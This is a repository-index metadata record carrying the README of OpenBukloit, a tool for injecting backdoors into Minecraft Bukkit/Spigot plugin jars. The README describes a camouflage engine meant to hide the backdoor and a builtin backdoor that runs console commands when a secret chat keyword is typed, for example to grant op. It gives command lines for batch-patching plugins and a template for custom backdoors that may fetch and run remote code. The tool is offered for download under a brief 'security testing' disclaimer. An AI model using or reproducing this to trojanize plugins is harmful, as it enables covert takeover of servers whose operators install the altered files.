{"id":14969622,"url":"https://github.com/voxelhax/openbukloit","last_synced_at":"2026-01-05T08:13:01.714Z","repository":{"id":41109074,"uuid":"496810230","full_name":"VoxelHax/OpenBukloit","owner":"VoxelHax","description":"Minecraft plugin backdoor injector","archived":false,"fork":false,"pushed_at":"2025-03-22T16:04:19.000Z","size":146,"stargazers_count":60,"open_issues_count":1,"forks_count":6,"subscribers_count":0,"default_branch":"master","last_synced_at":"2025-03-24T09:31:22.748Z","etag":null,"topics":["backdoor","bukkit","bukloit","bytecode-manipulation","injector","java","kotlin","minecraft","papermc","patcher","pentesting","spigot"],"latest_commit_sha":null,"homepage":"https://voxelhax.com/openbukloit","language":"Kotlin","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/VoxelHax.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-05-27T00:16:41.000Z","updated_at":"2025-03-23T12:16:55.000Z","dependencies_parsed_at":"2024-10-11T03:41:20.284Z","dependency_job_id":"be459b43-6f53-43de-b912-060e83216f3d","html_url":"https://github.com/VoxelHax/OpenBukloit","commit_stats":{"total_commits":26,"total_committers":4,"mean_commits":6.5,"dds":"0.11538461538461542","last_synced_commit":"c83caf7119c94b1e8bd3df95359051fd1513d013"},"previous_names":[],"tags_count":11,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VoxelHax%2FOpenBukloit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VoxelHax%2FOpenBukloit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VoxelHax%2FOpenBukloit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VoxelHax%2FOpenBukloit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/VoxelHax","download_url":"https://codeload.github.com/VoxelHax/OpenBukloit/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248657870,"owners_count":21140844,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","bukkit","bukloit","bytecode-manipulation","injector","java","kotlin","minecraft","papermc","patcher","pentesting","spigot"],"created_at":"2024-09-24T13:42:07.896Z","updated_at":"2026-01-05T08:13:01.707Z","avatar_url":"https://github.com/VoxelHax.png","language":"Kotlin","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cdiv align=\"center\"\u003e\u003ch1\u003eOpenBukloit - Minecraft plugin backdoor injector\u003c/h1\u003e\u003c/div\u003e\n\n\u003cdiv align=\"center\"\u003e\u003cimg alt=\"Logo\" src=\"logo.png\"/\u003e\u003c/div\u003e\n\n\u003cdiv align=\"center\"\u003e\n    \u003ca href=\"https://github.com/VoxelHax/OpenBukloit/issues\"\u003e\u003cimg alt=\"Open issues\" src=\"https://img.shields.io/github/issues-raw/VoxelHax/OpenBukloit\"/\u003e\u003c/a\u003e\n    \u003ca href=\"https://github.com/Voxelhax/OpenBukloit/releases/latest\"\u003e\u003cimg alt=\"GitHub downloads\" src=\"https://img.shields.io/github/downloads/VoxelHax/OpenBukloit/total\"\u003e\u003c/a\u003e\n    \u003cimg alt=\"Code size\" src=\"https://img.shields.io/github/languages/code-size/VoxelHax/OpenBukloit\"/\u003e\n    \u003ca href=\"https://www.codefactor.io/repository/github/voxelhax/openbukloit\"\u003e\u003cimg alt=\"CodeFactor\" src=\"https://www.codefactor.io/repository/github/voxelhax/openbukloit/badge\"/\u003e\u003c/a\u003e\n    \u003ca href=\"https://discord.gg/xtaktPTzYp\"\u003e\u003cimg alt=\"Discord\" src=\"https://img.shields.io/discord/928214827095175199\"\u003e\u003c/a\u003e\n\u003c/div\u003e\n\n\u003cdiv align=\"center\"\u003e\n    \u003ca href=\"https://github.com/Voxelhax/OpenBukloit/releases/latest\"\u003e\u003cimg alt=\"Download\" src=\"https://img.shields.io/badge/-DOWNLOAD_LATEST_RELEASE_(CLICK)-blue?style=for-the-badge\"/\u003e\u003c/a\u003e\n\u003c/div\u003e\n\n\u003cbr\u003e\n\n\u003chr\u003e\n\n**Languages: [English](README.md), [Русский](lang/README_RU.md), [Українська](lang/README_UA.md)**\n\n**OpenBukloit** is modern and powerful universal backdoor injector compatible with all Bukkit/Spigot/Paper/etc plugins. Its feature is ability to integrate with absolutely any plugin without the need to modify backdoor every time. Moreover, it provides powerful camouflage engine, which makes nearly impossible to find it without sufficient knowledge or advanced automated tools. OpenBukloit was developed to test the security systems of Minecraft servers, VoxelHax team is not responsible for its misuse.\n\nThis is a continuation of **[Bukloit](https://github.com/Rikonardo/Bukloit)** project, taking into account all the problems of the previous project and a completely different approach to development.\n\n## OpenBukloit features\n- **Full support for Bukkit and it's forks on any Minecraft version.**\n- **Custom backdoor support.**\n- **Automatic JDK downloading, so you don't need to care about Java version compatibility.**\n- **Powerful camouflage engine, which makes it harder to find backdoor in plugin.**\n\n## Installation\nIn order to use OpenBukloit you must have any Java version installed (but not lower than 8). OpenBukloit jar can be downloaded from [releases tab](https://github.com/Voxelhax/OpenBukloit/releases/latest). OpenBukloit does not require any additional actions, just put jar file somewhere and use it from command line.\n\n## Usage\nTo run OpenBukloit, open command prompt in the directory where OpenBukloit jar is located and type:\n\n```sh\njava -jar OpenBukloit.jar\n```\n\n*Make sure you include the version number after the OpenBukloit name. So for example if the version you downloaded is `OpenBukloit-1.0.12`, make sure to use the name `OpenBukloit-1.0.12.jar` for the command instead of just `OpenBukloit.jar`*\n\nAfter jar file name you can pass some arguments to configure injector:\n\n| Short Argument | Long Argument   | Description                                                                                                                                                                  | Type  |\n|----------------|-----------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------|\n| -e             | --exploit       | Path to custom .java or compiled .class file, that will be used as backdoor.\u003cbr /\u003e**By default uses builtin backdoor.**                                                      | Value |\n| -m             | --mode          | Mode. Can be single/multiple.\u003cbr /\u003e**Default: \u003cins\u003emultiple\u003c/ins\u003e.**\u003cbr /\u003eIn multiple mode, modifies all files in the specified folder. In single - only the specified file. | Value |\n| -i             | --input         | Path to input folder/file (mode dependent).\u003cbr /\u003e**Default: \u003cins\u003ein\u003c/ins\u003e (\u003cins\u003ein.jar\u003c/ins\u003e if mode is single).**                                                           | Value |\n| -o             | --output        | Path to output folder/file (mode dependent).\u003cbr /\u003e**Default: \u003cins\u003eout\u003c/ins\u003e (\u003cins\u003eout.jar\u003c/ins\u003e if mode is single).**                                                        | Value |\n| -r             | --replace       | Replace output file if it already exists.                                                                                                                                    | Flag  |\n|                | --no-camouflage | Do not apply camouflage (may be useful when camouflage not working correctly due to plugin obfuscation).                                                                     | Flag  |\n|                | --class-name    | **Works only with `--no-camouflage` flag!** Specify custom exploit class name (can include package, example: `com.voxelhax.OpenBukloitExploit`).                             | Value |\n|                | --method-name   | **Works only with `--no-camouflage` flag!** Specify custom name for `inject` exploit method.                                                                                 | Value |\n\nBut these arguments are not enough to run OpenBukloit. You must also specify backdoor params. Because OpenBukloit supports injecting of custom backdoors, you must pass additional arguments that required by used backdoor.\n\n## Builtin exploit\n\nBy default, OpenBukloit injects builtin backdoor. It is a simple backdoor that allows you to execute any commands as console by writing special keyword before command in chat.\n\nBuiltin backdoor params:\n\n| Long Argument | Description                                       |\n|---------------|---------------------------------------------------|\n| --key         | Keyword, that triggers console command execution. |\n\nIngame usage for key set to \"hackthisserver\":\n\n```\nhackthisserver op MyName\n```\n\nThis message sent to chat will be executed as console command and give op to MyName player.\n\n**Here is some examples of using OpenBukloit with builtin backdoor:**\n\n1. Patch all .jar files with the \"#console\" key from the \"in\" folder and save them into the \"out\" folder without replacement.\n\n```sh\njava -jar OpenBukloit.jar -m multiple -i \"in\" -o \"out\" --key \"#console\"\n```\n\n2. Patch all files with the \"hacktheserver\" key from the \"in\" folder and save them into the \"out\" folder with replacement.\n\n```sh\njava -jar OpenBukloit.jar -m multiple -i \"in\" -o \"out\" --key \"hacktheserver\" -r\n```\n\n3. Patch single file \"PluginName.jar\" with \"#console\" key and save it as \"Output.jar\" file with replacement.\n\n```sh\njava -jar OpenBukloit.jar -m single -i \"PluginName.jar\" -o \"Output.jar\" --key \"#console\" -r\n```\n\n4. Patch single file \"PluginName.jar\" with \"#console\" key and save it as \"Output.jar\" file with replacement. Do not apply camouflage and name exploit class \"com.voxelhax.OpenBukloitExploit\".\n\n```sh\njava -jar OpenBukloit.jar -m single -i \"PluginName.jar\" -o \"Output.jar\" --key \"#console\" -r --no-camouflage --class-name \"com.voxelhax.OpenBukloitExploit\"\n```\n\n## Writing custom exploit\n\nYou can also write your own backdoor. It should be a class with `public static void inject(JavaPlugin args)` method (JavaPlugin is from Bukkit API).\n\nHere is a simple example:\n\n```java\nimport org.bukkit.plugin.java.JavaPlugin;\n\npublic class MyBackdoor {\n    public static void inject(JavaPlugin args) {\n        System.out.println(\"Hello, world!\");\n    }\n}\n```\n\n`inject` method will be executed after plugin's `onEnable` method. You can do everything you want here, including downloading and running some arbitrary code from internet.\n\nBut you must know that there are some limitations:\n- Currently, you can't use nested classes, there is must be only one class in exploit file.\n- You shouldn't reference your exploit class inside it, like using it as method params, as a return value or as a field type.\n\nYou can take external params from command line, by using %placeholders%, thay will be replaced during injection:\n\n```java\nimport org.bukkit.plugin.java.JavaPlugin;\n\npublic class MyBackdoor {\n    public static void inject(JavaPlugin args) {\n        System.out.println(\"Hello, %name%!\");\n    }\n}\n```\n\nAnd then inject it with command:\n\n```sh\njava -jar OpenBukloit.jar -e MyBackdoor.java --name world\n```\n\nNote, that we can pass our backdoor to OpenBukloit without compiling, and it will automatically compile it with Spigot API in compiletime classpool.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvoxelhax%2Fopenbukloit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvoxelhax%2Fopenbukloit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvoxelhax%2Fopenbukloit/lists"}